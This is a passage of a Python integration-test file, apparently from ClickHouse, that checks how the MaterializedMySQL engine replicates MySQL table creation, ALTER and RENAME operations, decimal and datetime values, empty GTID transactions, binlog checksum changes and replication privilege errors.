mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
clickhouse_node.query("CREATE DATABASE test_database_dt ENGINE = MaterializedMySQL('{}:3306', 'test_database_dt', 'root', 'clickhouse')".format(service_name))
assert "test_database_dt" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_1 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
mysql_node.query("CREATE TABLE test_database_dt.test_table_2 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_2 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
clickhouse_node.query("DROP DATABASE test_database_dt")
mysql_node.query("DROP DATABASE test_database_dt")
def drop_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_drop")
mysql_node.query("CREATE DATABASE test_database_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("CREATE TABLE test_database_drop.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
mysql_node.query("INSERT INTO test_database_drop.test_table_2 VALUES(1), (2), (3), (4), (5), (6)")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_drop")
mysql_node.query("DROP DATABASE test_database_drop")
def create_table_like_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("DROP DATABASE IF EXISTS create_like2")
clickhouse_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("CREATE DATABASE create_like")
mysql_node.query("CREATE DATABASE create_like2")
mysql_node.query("CREATE TABLE create_like.t1 (id INT NOT NULL PRIMARY KEY)")
mysql_node.query("CREATE TABLE create_like2.t1 LIKE create_like.t1")
clickhouse_node.query(
f"CREATE DATABASE create_like ENGINE = MaterializeMySQL('{service_name}:3306', 'create_like', 'root', 'clickhouse')")
mysql_node.query("CREATE TABLE create_like.t2 LIKE create_like.t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\n")
mysql_node.query("USE create_like")
mysql_node.query("CREATE TABLE t3 LIKE create_like2.t1")
mysql_node.query("CREATE TABLE t4 LIKE t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\nt4\n")
check_query(clickhouse_node, "SHOW DATABASES LIKE 'create_like%'", "create_like\n")
clickhouse_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like2")
def create_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_create")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_create")
mysql_node.query("CREATE DATABASE test_database_create DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_create.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("INSERT INTO test_database_create.test_table_1 VALUES(1), (2), (3), (5), (6), (7);")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_create ENGINE = MaterializedMySQL('{}:3306', 'test_database_create', 'root', 'clickhouse')".format(
service_name))
# Check for pre-existing status
assert "test_database_create" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_1 ORDER BY id FORMAT TSV",
"1\n2\n3\n5\n6\n7\n")
mysql_node.query("CREATE TABLE test_database_create.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_create.test_table_2 VALUES(1), (2), (3), (4), (5), (6);")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
clickhouse_node.query("DROP DATABASE test_database_create")
mysql_node.query("DROP DATABASE test_database_create")
def rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename")
mysql_node.query("CREATE DATABASE test_database_rename DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_rename.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("RENAME TABLE test_database_rename.test_table_1 TO test_database_rename.test_table_2")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_2\n")
mysql_node.query("RENAME TABLE test_database_rename.test_table_2 TO test_database_rename.test_table_1")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database_rename")
mysql_node.query("DROP DATABASE test_database_rename")
def alter_add_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_add")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_add")
mysql_node.query("CREATE DATABASE test_database_add DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_add.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_1 INT NOT NULL")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_add ENGINE = MaterializedMySQL('{}:3306', 'test_database_add', 'root', 'clickhouse')".format(
service_name))
assert "test_database_add" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_add.test_table_1 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("CREATE TABLE test_database_add.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_add FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_1 INT NOT NULL, ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1, ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
default_expression = "DEFAULT\t0" if service_name == "mysql57" else "DEFAULT\tid"
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t" + default_expression + "\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_add.test_table_2 VALUES(1, 2, 3, 4, 5), (6, 7, 8, 9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_add.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\t3\t4\t5\n6\t7\t8\t9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_add")
mysql_node.query("DROP DATABASE test_database_add")
def alter_drop_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
mysql_node.query("CREATE DATABASE test_database_alter_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_1 DROP COLUMN drop_column")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_2 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_2 DROP COLUMN drop_column")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_drop.test_table_2 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_drop.test_table_2 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_alter_drop")
mysql_node.query("DROP DATABASE test_database_alter_drop")
def alter_rename_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_rename")
mysql_node.query("CREATE DATABASE test_database_alter_rename DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_1 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_1 RENAME COLUMN rename_column TO new_column_name")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_rename.test_table_2 (id INT NOT NULL PRIMARY KEY, rename_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nrename_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_rename.test_table_2 RENAME COLUMN rename_column TO new_column_name")
check_query(clickhouse_node, "DESC test_database_alter_rename.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nnew_column_name\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_rename.test_table_2 VALUES(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_rename.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\n3\t4\n5\t6\n7\t8\n9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_alter_rename")
mysql_node.query("DROP DATABASE test_database_alter_rename")
def alter_modify_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_modify")
mysql_node.query("CREATE DATABASE test_database_alter_modify DEFAULT CHARACTER SET 'utf8'")
# maybe should test rename primary key?
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_1 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_1 MODIFY COLUMN modify_column INT")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_modify ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_modify', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_modify" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_modify.test_table_2 (id INT NOT NULL PRIMARY KEY, modify_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_modify FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT FIRST")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"modify_column\tNullable(Int32)\t\t\t\t\t\nid\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_modify.test_table_2 MODIFY COLUMN modify_column INT AFTER id")
check_query(clickhouse_node, "DESC test_database_alter_modify.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\nmodify_column\tNullable(Int32)\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_alter_modify.test_table_2 VALUES(1, 2), (3, NULL)")
check_query(clickhouse_node, "SELECT * FROM test_database_alter_modify.test_table_2 ORDER BY id FORMAT TSV", "1\t2\n3\t\\N\n")
clickhouse_node.query("DROP DATABASE test_database_alter_modify")
mysql_node.query("DROP DATABASE test_database_alter_modify")
# TODO: need ClickHouse support ALTER TABLE table_name ADD COLUMN column_name, RENAME COLUMN column_name TO new_column_name;
# def test_mysql_alter_change_column_for_materialized_mysql_database(started_cluster):
# pass
def alter_rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename_table")
mysql_node.query("CREATE DATABASE test_database_rename_table DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_3")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename_table ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename_table', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename_table" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_3 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_1\ntest_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_4")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\ntest_table_4\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_4 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_rename_table.test_table_4 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_rename_table.test_table_4 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_rename_table")
mysql_node.query("DROP DATABASE test_database_rename_table")
def query_event_with_empty_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_event")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_event")
mysql_node.query("CREATE DATABASE test_database_event")
mysql_node.query("RESET MASTER")
mysql_node.query("CREATE TABLE test_database_event.t1(a INT NOT NULL PRIMARY KEY, b VARCHAR(255) DEFAULT 'BEGIN')")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(1)")
clickhouse_node.query(
"CREATE DATABASE test_database_event ENGINE = MaterializedMySQL('{}:3306', 'test_database_event', 'root', 'clickhouse')".format(
service_name))
# Reject one empty GTID QUERY event with 'BEGIN' and 'COMMIT'
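    # "Executed_Gtid_Set" has the form "<server_uuid>:<first>-<last>"; setting gtid_next to
    # "<server_uuid>:<last + 1>" and issuing a bare BEGIN/COMMIT writes an empty transaction
    # under that GTID into the binlog, which the replication consumer must skip.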
mysql_cursor = mysql_node.alloc_connection().cursor(pymysql.cursors.DictCursor)
mysql_cursor.execute("SHOW MASTER STATUS")
(uuid, seqs) = mysql_cursor.fetchall()[0]["Executed_Gtid_Set"].split(":")
(seq_begin, seq_end) = seqs.split("-")
next_gtid = uuid + ":" + str(int(seq_end) + 1)
mysql_node.query("SET gtid_next='" + next_gtid + "'")
mysql_node.query("BEGIN")
mysql_node.query("COMMIT")
mysql_node.query("SET gtid_next='AUTOMATIC'")
# Reject one 'BEGIN' QUERY event and 'COMMIT' XID event.
mysql_node.query("/* start */ begin /* end */")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(2)")
mysql_node.query("/* start */ commit /* end */")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_event FORMAT TSV", "t1\n")
check_query(clickhouse_node, "SELECT * FROM test_database_event.t1 ORDER BY a FORMAT TSV", "1\tBEGIN\n2\tBEGIN\n")
clickhouse_node.query("DROP DATABASE test_database_event")
mysql_node.query("DROP DATABASE test_database_event")
def select_without_columns(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS db")
clickhouse_node.query("DROP DATABASE IF EXISTS db")
mysql_node.query("CREATE DATABASE db")
mysql_node.query("CREATE TABLE db.t (a INT PRIMARY KEY, b INT)")
clickhouse_node.query(
"CREATE DATABASE db ENGINE = MaterializedMySQL('{}:3306', 'db', 'root', 'clickhouse') SETTINGS max_flush_data_time = 100000".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM db FORMAT TSV", "t\n")
clickhouse_node.query("SYSTEM STOP MERGES db.t")
clickhouse_node.query("CREATE VIEW v AS SELECT * FROM db.t")
mysql_node.query("INSERT INTO db.t VALUES (1, 1), (2, 2)")
mysql_node.query("DELETE FROM db.t WHERE a = 2;")
    # We need to execute a DDL statement to force a flush of the data buffer
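    # The MaterializedMySQL database above was created with max_flush_data_time = 100000, so a
    # time-based flush will not happen during the test; replicating a DDL statement forces the
    # buffered row changes to be written to the ClickHouse tables first.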
mysql_node.query("CREATE TABLE db.temporary(a INT PRIMARY KEY, b INT)")
optimize_on_insert = clickhouse_node.query("SELECT value FROM system.settings WHERE name='optimize_on_insert'").strip()
if optimize_on_insert == "0":
res = ["3\n", "2\n", "2\n"]
else:
res = ["2\n", "2\n", "1\n"]
check_query(clickhouse_node, "SELECT count((_sign, _version)) FROM db.t FORMAT TSV", res[0])
assert clickhouse_node.query("SELECT count(_sign) FROM db.t FORMAT TSV") == res[1]
assert_eq_with_retry(clickhouse_node, "SELECT count(_version) FROM db.t", res[2].strip(), sleep_time=2, retry_count=3)
assert clickhouse_node.query("SELECT count() FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count(*) FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM (SELECT * FROM db.t) FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM v FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM merge('db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM remote('localhost', 'db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT _part FROM db.t FORMAT TSV") == "0_1_1_0\n"
assert clickhouse_node.query("SELECT _part FROM remote('localhost', 'db', 't') FORMAT TSV") == "0_1_1_0\n"
clickhouse_node.query("DROP VIEW v")
clickhouse_node.query("DROP DATABASE db")
mysql_node.query("DROP DATABASE db")
def insert_with_modify_binlog_checksum(clickhouse_node, mysql_node, service_name):
mysql_node.query("CREATE DATABASE test_checksum")
mysql_node.query("CREATE TABLE test_checksum.t (a INT PRIMARY KEY, b varchar(200))")
clickhouse_node.query("CREATE DATABASE test_checksum ENGINE = MaterializedMySQL('{}:3306', 'test_checksum', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_checksum FORMAT TSV", "t\n")
mysql_node.query("INSERT INTO test_checksum.t VALUES(1, '1111')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n")
mysql_node.query("SET GLOBAL binlog_checksum=NONE")
mysql_node.query("INSERT INTO test_checksum.t VALUES(2, '2222')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n")
mysql_node.query("SET GLOBAL binlog_checksum=CRC32")
mysql_node.query("INSERT INTO test_checksum.t VALUES(3, '3333')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n3\t3333\n")
clickhouse_node.query("DROP DATABASE test_checksum")
mysql_node.query("DROP DATABASE test_checksum")
def err_sync_user_privs_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("CREATE DATABASE priv_err_db DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE priv_err_db.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(1);")
mysql_node.create_min_priv_user("test", "123")
mysql_node.result("SHOW GRANTS FOR 'test'@'%';")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "1\n", 30, 5)
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(2);")
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "2\n")
clickhouse_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("REVOKE REPLICATION SLAVE ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE REPLICATION CLIENT, RELOAD ON *.* FROM 'test'@'%'")
